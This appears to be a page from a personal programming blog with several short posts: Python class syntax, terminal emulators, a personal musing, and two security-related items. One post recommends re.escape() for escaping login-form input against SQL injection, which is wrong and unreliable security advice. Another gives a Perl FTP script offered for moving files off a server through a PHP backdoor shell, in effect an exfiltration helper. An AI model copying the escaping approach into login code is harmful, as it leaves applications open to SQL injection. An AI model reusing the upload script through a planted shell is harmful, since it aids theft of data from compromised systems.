re.escape(): Python’s equivalent of PHP’s addslashes()

PHP has a very handy function addslashes which escapes, by prefixing backslashes, characters that can cause undesired effects in SQL queries (read SQL injection). Coding a login page in Python had me hard pressed to find something similar in Python to escape characters retrieved from login forms. I won’t say I searched across the seven seas, but as much as I looked, I discovered the “escape” function from the “re” module. I cannot find a reference online (I need to search better and more thoroughly), but re.escape in effect escapes all non-alphanumeric characters in string given to it as argument.

The __doc__ string for re.escape says:

escape(pattern)
    Escape all non-alphanumeric characters in pattern.

Advertisements

Python Classes: Old-style vs New-style

I ran into a bit of a problem, trying to use the new-style class syntax while calling a class that apparently only supports the old-class style syntax (thanks due to Brend on #python at irc.freenode.net for pointing that out). Look closely at the call to super() in the following code:

#!/usr/bin/python
# -*- set tabstop=4 -*-

import cgi

class CGIWrapper(cgi.FieldStorage):
    def __init__(self):
        super(CGIWrapper, self).__init__()

if __name__ == "__main__":
    c = CGIWrapper()

---------Error----------------
Traceback (most recent call last):
 File "yoyo.py", line 17, in ?
  c = CGIWrapper()
 File "yoyo.py", line 9, in __init__
  super(CGIWrapper, self).__init__()
TypeError: super() argument 1 must be type, not classobj

The workaround, naturally, is to call cgi.FieldStorage using the old-class style way.


class CGIWrapper(cgi.FieldStorage):
    def __init__(self):
        cgi.FieldStorage.__init__(self)

Backdoor PHP Shells and a small script to upload files.

Backdoor PHP shells are receiving a lot of attention from script kiddies. Unless you know what PHP backdoor shells do, they provide a web-based interface to execute shell commands on systems on which they have been maliciously setup.

A friend once asked me to write him a script to upload files from a server via the PHP shell interface to some anonymous FTP server. I wrote the following minimalist Perl script.

use Net::FTP;

my $host = '';
my $port = 21;
my $user = '';
my $pass = '';

my $file = shift || die "usage: $0 file";

my $ftp = Net::FTP->new($host) or die "failed.$!";
$ftp->login($user, $pass);
$ftp->binary();
$ftp->put($file);
$ftp->quit();

I am making it available here for I don’t know what reason.

aterm, xterm, Eterm, rxvt, Konsole, oh my!

Konsole” supports transparency, but it is slow (and most importantly for me, does not have the “fixed” fonts that xterm uses). “xterm” is cool, but I want transparency which it doesn’t have. “Eterm” is, again, slower than “xterm”, and though it does support backgrounds, you cannot, as far as I have explored it, make “Eterm” use any image for background. On the flip side, “Eterm” has support for the fixed fonts like xterm. But I desperately need “transparency”.

Look at “aterm”. Although working on the shoulders of “rxvt”, “aterm” is pretty much like “xterm”, supports all the things “xterm” does, and provides fast visually pleasing effects (without hogging up resources like Konsole), including, what I want the most, transparency. Not only that, you can configure “aterm” to use fixed font. What more do I want?

If you have aterm installed, invoke it with the following arguments:

aterm -tr -trsb -cr red +sb -fg gray -fn fixed -fb fixed

Abstinence (Random Musings #21)

I have an overly sensitive stomach and digestive system. I really should refrain from eating most things that aren’t cooked at home. I know what happens when I do it, yet I persist, and wake up the next morning with an upset stomach and a foul mood. Sigh.